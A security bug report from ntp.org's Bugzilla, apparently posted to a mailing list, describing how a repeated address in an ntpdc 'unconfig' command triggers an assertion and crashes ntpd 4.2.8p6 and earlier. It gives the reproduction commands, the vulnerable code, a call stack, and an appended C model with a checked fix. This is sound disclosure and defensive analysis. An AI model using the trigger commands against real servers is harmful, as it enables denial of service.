[ntp:security] [Bug 3011] Duplicate IPs on unconfig directives will cause an assertion botch

bugzilla-daemon at ntp.org bugzilla-daemon at ntp.org
Wed Feb 3 09:19:20 UTC 2016


http://bugs.ntp.org/show_bug.cgi?id=3011

Harlan Stenn <stenn at ntp.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
              Group|                            |Security
                 CC|                            |LRlian at 163.com
            Summary|x                           |Duplicate IPs on unconfig
                   |                            |directives will cause an
                   |                            |assertion botch
              Flags|                            |blocking4.2.8+

--- Comment #1 from Harlan Stenn <stenn at ntp.org> 2016-02-03 09:19:20 UTC ---
================ target environment =================

ntp-4.2.8p6 and lower

======================= test commands =======================

When I use these commands:

ntpdc> addpeer 1.1.1.1
Keyid: 8
MD5 Password:
done!

ntpdc> unconfig 1.1.1.1 1.1.1.1
192.168.1.111: timed out, nothing received
***Request timed out

The key point is that the command unconfig must have the same two peeraddrs. My
test peeraddr is 1.1.1.1
======================== vulnerable code ========================
ntp_request.c:

do_unconf()
{
        …
                found = FALSE;
                p = NULL;

                while (!found) {
                        p = findexistingpeer(&peeraddr, NULL, p, -1, 0);
                        if (NULL == p)
                                break;
                        if (FLAG_CONFIG & p->flags)
                                found = TRUE;
                }
                INSIST(found);          // !!!!!!!!!!!
                // If "found" is FALSE, INSIST will call isc_assertion_failed()
                // and abort(), and the ntp server will crash.
                // If "unconfig" is given two same peeraddrs, "found" will be
                // FALSE on the second loop.
                // So if I "unconfig" two same peeraddrs, the ntp server will crash.
                INSIST(NULL != p);

                peer_clear(p, "GONE");
                unpeer(p);              // !!!!!!
        …
}
======================== call stacks =======================
#0  0x00007ffff66b65f7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x00007ffff66b7ce8 in __GI_abort () at abort.c:90
#2  0x000000000057ba29 in assertion_failed (file=0x960660 <.str.25> "ntp_request.c", line=1494, type=isc_assertiontype_insist, cond=0x9606a0 <.str.26> "found") at ntpd.c:1443
#3  0x000000000084d4da in isc_assertion_failed (file=0x960660 <.str.25> "ntp_request.c", line=1494, type=isc_assertiontype_insist, cond=0x9606a0 <.str.26> "found") at ./../lib/isc/assertions.c:57
#4  0x000000000068dfa8 in do_unconf (srcadr=0x61d000018688, inter=0x611000009640, inpkt=0x61d0000186ec) at ntp_request.c:1494
#5  0x000000000067a74d in process_private (rbufp=0x61d000018680, mod_okay=1) at ntp_request.c:669
#6  0x000000000063c162 in receive (rbufp=0x61d000018680) at ntp_proto.c:496
#7  0x000000000057b689 in ntpdmain (argc=0, argv=0x7fffffffe150) at ntpd.c:1270
#8  0x0000000000574818 in main (argc=3, argv=0x7fffffffe138) at ntpd.c:353

Hope this email could help you!

Best regards!

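An added example, not part of the bug report and not ntpd's code: a simplified C model of the lookup loop quoted in Comment #1, showing why the second lookup for a repeated address finds nothing and how a handler can report that item as an error rather than assert on request data. `struct peer`, `find_peer`, `unconf_checked`, the return codes and the flag value are hypothetical stand-ins.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
/* Simplified model: names and values here are assumptions, not ntpd's. */
#define FLAG_CONFIG 0x1
enum { UNCONF_OK = 0, UNCONF_NODATA = -1 };

struct peer { const char *addr; int flags; int live; };
/* Continue the search after prev, as the quoted lookup loop does. */
static struct peer *find_peer(struct peer *tbl, size_t n,
                              const char *addr, struct peer *prev)
{
    size_t i = prev ? (size_t)(prev - tbl) + 1 : 0;
    for (; i < n; i++)
        if (tbl[i].live && strcmp(tbl[i].addr, addr) == 0)
            return &tbl[i];
    return NULL;
}

/* Remove each requested peer. An address with no configured peer left
 * (e.g. the second copy of a duplicate) is reported to the caller through
 * *failed instead of being asserted on. */
int unconf_checked(struct peer *tbl, size_t n,
                   const char **items, size_t nitems, size_t *failed)
{
    for (size_t i = 0; i < nitems; i++) {
        struct peer *p = NULL;
        int found = 0;
        while (!found && (p = find_peer(tbl, n, items[i], p)) != NULL)
            found = (p->flags & FLAG_CONFIG) != 0;
        if (!found) {           /* the quoted code reaches INSIST(found) here */
            *failed = i;
            return UNCONF_NODATA;
        }
        p->live = 0;            /* stands in for peer_clear() + unpeer() */
    }
    return UNCONF_OK;
}

int main(void)
{
    struct peer tbl[] = { { "1.1.1.1", FLAG_CONFIG, 1 } };  /* constructed */
    const char *req[] = { "1.1.1.1", "1.1.1.1" };
    size_t failed = 0;
    int rc = unconf_checked(tbl, 1, req, 2, &failed);
    printf("rc=%d failed_item=%zu\n", rc, failed);
    return 0;
}
```

In this model the first copy of the address is removed and the second is returned as a per-item error, so the process keeps running.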